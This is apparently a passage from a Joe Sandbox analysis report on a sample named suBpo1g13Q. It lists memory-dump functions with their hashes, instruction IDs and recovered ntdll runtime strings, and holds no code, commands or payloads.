                                                                                                                • Opcode ID: ce875db22bd42b54bb20966d96ae5f4ac1a862e5ef054cac59c4e56449568448
                                                                                                                • Instruction ID: 91d26e08b8229b0af3409571d3593848a27d12c88e69271f55f6b0ce18614019
                                                                                                                • Opcode Fuzzy Hash: ce875db22bd42b54bb20966d96ae5f4ac1a862e5ef054cac59c4e56449568448
                                                                                                                • Instruction Fuzzy Hash: C190023160140502D500759854086460005D7F1301F55D016A6024966EC775C9A56231
                                                                                                                Function 014E2F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0c81f3b77e97a680efedc222121680bfae0c544d163eba484acb3daad54260ab
                                                                                                                • Instruction ID: 56091d6bc5a4352831860ce35ac859ed36b172e921a0b4d18da7dfa499269a1d
                                                                                                                • Opcode Fuzzy Hash: 0c81f3b77e97a680efedc222121680bfae0c544d163eba484acb3daad54260ab
                                                                                                                • Instruction Fuzzy Hash: FA90026161140142D504715844047060045D7F2201F55C017A3154965CC739CD755225
                                                                                                                Function 014E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2658ab0e24557fe5078414db6fa10135ee95184b401ada44c39ad7fc61f0da29
                                                                                                                • Instruction ID: 92b8cf2fee5e2b950cacb5c1b73ac0a3a656c13f726fcc23ec3d0f580d3df8ad
                                                                                                                • Opcode Fuzzy Hash: 2658ab0e24557fe5078414db6fa10135ee95184b401ada44c39ad7fc61f0da29
                                                                                                                • Instruction Fuzzy Hash: 9490026174140542D50071584414B060005D7F2301F55C01AE2064965DC729CD666226
                                                                                                                Function 014E2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f09d485e932b6c9a1f2698a369102116881e9aaecea3ef8014146a5e082fa4da
                                                                                                                • Instruction ID: 7c3e3a49322521dffde133bdd93d4b77650462a59634525434db0b6315a756a9
                                                                                                                • Opcode Fuzzy Hash: f09d485e932b6c9a1f2698a369102116881e9aaecea3ef8014146a5e082fa4da
                                                                                                                • Instruction Fuzzy Hash: B0900221611C0142D60075684C14B070005D7E1303F55C11AA1154965CCB25C9755621
                                                                                                                Function 014E2F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 92defaeaea0e6a37853d4d6e9dfb8804eb82f44674c747b4cfd624cedb8136a7
                                                                                                                • Instruction ID: 5e06ece8d23c19596a5109cc903171f3068120dfe22b71d2f84aa328753eae93
                                                                                                                • Opcode Fuzzy Hash: 92defaeaea0e6a37853d4d6e9dfb8804eb82f44674c747b4cfd624cedb8136a7
                                                                                                                • Instruction Fuzzy Hash: 8090023160180502D5007158481470B0005D7E1302F55C016A2164966DC735C9656671
                                                                                                                Function 014E2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d09cc07256fb581e30bc3c631f9ddbe2b69197fb3d6410dc6fe5b88bc958d34a
                                                                                                                • Instruction ID: 9765cd71cc380527d111be535b97dfaab2eb294f2206e1cb641e319fd6296faf
                                                                                                                • Opcode Fuzzy Hash: d09cc07256fb581e30bc3c631f9ddbe2b69197fb3d6410dc6fe5b88bc958d34a
                                                                                                                • Instruction Fuzzy Hash: 0D90023160180502D500715848087470005D7E1302F55C016A6164966EC775C9A56631
                                                                                                                Function 014E2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 23746fa5b30addc43084dbbda9dbe3b888ec3794a450a8d98bdb7e7a4e8e69f3
                                                                                                                • Instruction ID: f5b2aa16701cdf6d123cfe45864ea440aa995eeee6b67256bec694fe2ce564d7
                                                                                                                • Opcode Fuzzy Hash: 23746fa5b30addc43084dbbda9dbe3b888ec3794a450a8d98bdb7e7a4e8e69f3
                                                                                                                • Instruction Fuzzy Hash: F9900221A01401424540716888449064005FBF2211755C126A1998961DC769C9795765
                                                                                                                Function 014E2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f8799814d5c76ef06eb5f9a09e75e2fe1c43a7d99be191847c46bb7201e03403
                                                                                                                • Instruction ID: 6ae71c49923f2dbdc2d6528b21da8b6430732ce7291feec5c1d5cad6f646c18a
                                                                                                                • Opcode Fuzzy Hash: f8799814d5c76ef06eb5f9a09e75e2fe1c43a7d99be191847c46bb7201e03403
                                                                                                                • Instruction Fuzzy Hash: 3C90022170140502D502715844146060009D7E2345F95C017E2424966DC735CA67A232
                                                                                                                Function 014E2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fd8646904c5fc72e8cd0ca812990138973243adedaa6c7fe1836d7f794605d4c
                                                                                                                • Instruction ID: 4f0970cb0017cb02dd4f30f4757287b513bd0a457e1b17c60955e124bd97882e
                                                                                                                • Opcode Fuzzy Hash: fd8646904c5fc72e8cd0ca812990138973243adedaa6c7fe1836d7f794605d4c
                                                                                                                • Instruction Fuzzy Hash: 8590026160180503D540755848046070005D7E1302F55C016A3064966ECB39CD656235
                                                                                                                Function 014E2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 433c36e4753a2b469efc7f26a75b46966d7dd1ec0f43ca919286d18a510783aa
                                                                                                                • Instruction ID: 772c848872814c2f5ba8f9a40c10f95ea8f65f848a970f181c83776beff93138
                                                                                                                • Opcode Fuzzy Hash: 433c36e4753a2b469efc7f26a75b46966d7dd1ec0f43ca919286d18a510783aa
                                                                                                                • Instruction Fuzzy Hash: F2900221A0140602D50171584404616000AD7E1241F95C027A2024966ECB35CAA6A231
                                                                                                                Function 014E2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ca9038d2f0a8073524d8e04d9b6eee38963b7568db3a92818957b75ef59e41e4
                                                                                                                • Instruction ID: 7b09d697012c2fa1e4cc60b8dcd9dd8eb8434c2ef6fea28c7c02918672051033
                                                                                                                • Opcode Fuzzy Hash: ca9038d2f0a8073524d8e04d9b6eee38963b7568db3a92818957b75ef59e41e4
                                                                                                                • Instruction Fuzzy Hash: B190027160140502D540715844047460005D7E1301F55C016A6064965EC769CEE96765
                                                                                                                Function 014E3010 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 75c1d8d8bb9e1801dfc24634923e65043665655bc7cf63c2b0f54c9a937d6c50
                                                                                                                • Instruction ID: c5a0bc89570a4613a9b3d0c5b2e4759078490479a2f4e27d1250c43dd8d90037
                                                                                                                • Opcode Fuzzy Hash: 75c1d8d8bb9e1801dfc24634923e65043665655bc7cf63c2b0f54c9a937d6c50
                                                                                                                • Instruction Fuzzy Hash: 3990022160184542D54072584804B0F4105D7F2202F95C01EA5156965CCB25C9695721
                                                                                                                Function 014E3090 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b53fb3654903441cd80127d93a1b87ac834bdaaef1b3ea610a23ca3b4ccb47ee
                                                                                                                • Instruction ID: ae103a272fe30ebc52756fe9fe667b0e870381652a40948f7759acaffee8b32d
                                                                                                                • Opcode Fuzzy Hash: b53fb3654903441cd80127d93a1b87ac834bdaaef1b3ea610a23ca3b4ccb47ee
                                                                                                                • Instruction Fuzzy Hash: D590022164140902D540715884147070006D7E1601F55C016A1024965DC726CA7967B1
                                                                                                                Function 014E39B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9bf98920f3ca1c3e21c8ed84f84cfe01aca87da99c55834473f5d08146ec2ea4
                                                                                                                • Instruction ID: 3b2231d2b9db0d3f95e5eba7b0ebbdd31cdf3a785bf179f6e179d2bcf7be9abb
                                                                                                                • Opcode Fuzzy Hash: 9bf98920f3ca1c3e21c8ed84f84cfe01aca87da99c55834473f5d08146ec2ea4
                                                                                                                • Instruction Fuzzy Hash: 1190022164545202D550715C44046164005F7F1201F55C026A18149A5DC765C9696321
                                                                                                                Function 014E3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0a2edc3969f8205ab9839dc2dd277e21173e56d44a0da6bc838b3ab35d8433b2
                                                                                                                • Instruction ID: e1b8d78d63c00de8b9a5fbf706fb39d47b4bea4d6fb85a4298de75dc821639ce
                                                                                                                • Opcode Fuzzy Hash: 0a2edc3969f8205ab9839dc2dd277e21173e56d44a0da6bc838b3ab35d8433b2
                                                                                                                • Instruction Fuzzy Hash: 8A90023560140502D910715858046460046D7E1301F55D416A1424969DC764C9B5A221
                                                                                                                Function 014E3D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 68273c2ae548c6a4d39857ff8507f6011519ddc609c2546be006533c0917f05d
                                                                                                                • Instruction ID: 05f5e9f80454f21ad2818676e47dad9d4cfc7110688435be2c601df093ad9460
                                                                                                                • Opcode Fuzzy Hash: 68273c2ae548c6a4d39857ff8507f6011519ddc609c2546be006533c0917f05d
                                                                                                                • Instruction Fuzzy Hash: A690023160240242994072585804A4E4105D7F2302B95D41AA1015965CCB24C9755321
                                                                                                                Function 014E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction ID: 7d3e12b8ff83a606d8f201063d1aa649fa7a521a531f71ca39533797864ecef2
                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Function 014E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                • Opcode ID: c9ca1b67b0bcc1605d1f1095b7de684d32710c16a96dabfb02004eb20203ad4f
                                                                                                                • Instruction ID: 65350bc5e064fee78470c8fe52f7762850089f7ed1e7319cfd4e4cd026c3b8f6
                                                                                                                • Opcode Fuzzy Hash: c9ca1b67b0bcc1605d1f1095b7de684d32710c16a96dabfb02004eb20203ad4f
                                                                                                                • Instruction Fuzzy Hash: B25105B6A04156AFDF12DFAD888497EFBFCBB48241710822AE455D7651D374DE0087A0
                                                                                                                Function 01552410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                • Opcode ID: 05a99dbe418faabbc0858fce44ec58fe4f57e6bb7105756b76e0196fdd4771b7
                                                                                                                • Instruction ID: f6c19c6646765534b7b9bc489b8f7084d7973a33c04ba11d7b532057f672f367
                                                                                                                • Opcode Fuzzy Hash: 05a99dbe418faabbc0858fce44ec58fe4f57e6bb7105756b76e0196fdd4771b7
                                                                                                                • Instruction Fuzzy Hash: 8651F875A00645EECF60DF6DC8A097EBBF9BB44204F14845FE996CF642E6B4DA008760
                                                                                                                Function 014D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01514725
                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01514787
                                                                                                                • Execute=1, xrefs: 01514713
                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015146FC
                                                                                                                • ExecuteOptions, xrefs: 015146A0
                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01514655
                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01514742
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                • API String ID: 0-484625025
                                                                                                                • Opcode ID: 51e8eb1b16d411e20a01aac7dce5239b55d248880502b2860f0a443c293544d2
                                                                                                                • Instruction ID: 69acb1fb573d832c22a7e1b2950fedc08f14635ed6326e4a41206069db51aef6
                                                                                                                • Opcode Fuzzy Hash: 51e8eb1b16d411e20a01aac7dce5239b55d248880502b2860f0a443c293544d2
                                                                                                                • Instruction Fuzzy Hash: 13518D3160021A7BEF11ABA9DC95FAE3BB8FF15715F14009FD509AB1E0E770AA028F50
                                                                                                                Function 01576940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                • Instruction ID: 3fc4ae968be85bb7b54d806b2ad893cd910a3da4e9bd2bb4deada797820af400
                                                                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                • Instruction Fuzzy Hash: E70213B1508742AFE305CF19D895A6FBBE5FFD8700F04892DB9998B260DB31E905CB52
                                                                                                                Function 014EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-$0$0
                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                • Instruction ID: 185cc0b20c9a1af70ed78c468672ac32ad711904e9339d4e8982afad44e71765
                                                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                • Instruction Fuzzy Hash: ED81CE70E452498EEF298E6CC8987BEBBF1FF45322F18421BD891A77A1C6308841CB51
                                                                                                                Function 015520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                • Opcode ID: 46f5c1c97f0976f7057a952dc681aae9c177cb4cf86a346f3d8d81fa6a543def
                                                                                                                • Instruction ID: 79a37053504dcc2424de8fc6e7027256f65268358f85fb9740c393dedbc7230f
                                                                                                                • Opcode Fuzzy Hash: 46f5c1c97f0976f7057a952dc681aae9c177cb4cf86a346f3d8d81fa6a543def
                                                                                                                • Instruction Fuzzy Hash: 7521517AA00119ABDB50DF79DC54ABFBBE9BF54640F08011BEE05E7201E730D9018BA1
                                                                                                                Function 014CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015102E7
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015102BD
                                                                                                                • RTL: Re-Waiting, xrefs: 0151031E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                • API String ID: 0-2474120054
                                                                                                                • Opcode ID: 1b398749bdd97b698f3663e6dbaa073d82aa9745c16eb30b60a31b4105ad8c8e
                                                                                                                • Instruction ID: 9988d918bb88c0f1b4e6c068da3a965469f0c07f9c924588406eca8851a09e09
                                                                                                                • Opcode Fuzzy Hash: 1b398749bdd97b698f3663e6dbaa073d82aa9745c16eb30b60a31b4105ad8c8e
                                                                                                                • Instruction Fuzzy Hash: 8EE1DF346047429FE726CF28C884B6ABBE1BB84714F140A1EF5A5CB2E1D778D949CB52
                                                                                                                Function 014DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01517B7F
                                                                                                                • RTL: Resource at %p, xrefs: 01517B8E
                                                                                                                • RTL: Re-Waiting, xrefs: 01517BAC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 0-871070163
                                                                                                                • Opcode ID: 36ab1348f462630981a190892295379c3fde1d8bd2741c7592983d3c11162345
                                                                                                                • Instruction ID: d670ca06054816089e9745c883c4e6d394136375150abc233b7c008f2cc64c7b
                                                                                                                • Opcode Fuzzy Hash: 36ab1348f462630981a190892295379c3fde1d8bd2741c7592983d3c11162345
                                                                                                                • Instruction Fuzzy Hash: 7841D3313007039BDB21DE29C860B6BB7E5FF9A720F110A1EE956DB3A0DB71E4058B91
                                                                                                                Function 014DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0151728C
                                                                                                                Strings
                                                                                                                • RTL: Resource at %p, xrefs: 015172A3
                                                                                                                • RTL: Re-Waiting, xrefs: 015172C1
                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01517294
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 885266447-605551621
                                                                                                                • Opcode ID: a681b1f6c042bb81d6ebc8bf6a2cd098f45eee358ff998cd1789f203d17e8d3b
                                                                                                                • Instruction ID: d05e20719e132362d7bba95022bfd9a67dc3d36b0c10bd8a9025eafc645e91f6
                                                                                                                • Opcode Fuzzy Hash: a681b1f6c042bb81d6ebc8bf6a2cd098f45eee358ff998cd1789f203d17e8d3b
                                                                                                                • Instruction Fuzzy Hash: 3741D631700603ABDB11DE29CC41FAAB7A5FB99714F11062EF9559B250DB31F85287D1
                                                                                                                Function 01552300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$]:%u
                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                • Opcode ID: c372e2bbfd730f565bb779e53c5e4d0b2545953460c2d15bcd7e612c28711f78
                                                                                                                • Instruction ID: bfe616788acb240898782c7183326d6a27ef9872ad79a4c1f581c8ea3434b117
                                                                                                                • Opcode Fuzzy Hash: c372e2bbfd730f565bb779e53c5e4d0b2545953460c2d15bcd7e612c28711f78
                                                                                                                • Instruction Fuzzy Hash: 77318472A00219DFDB60DF29CC50BEE77F8FB54610F45459BED49E7201EB30AA488BA0
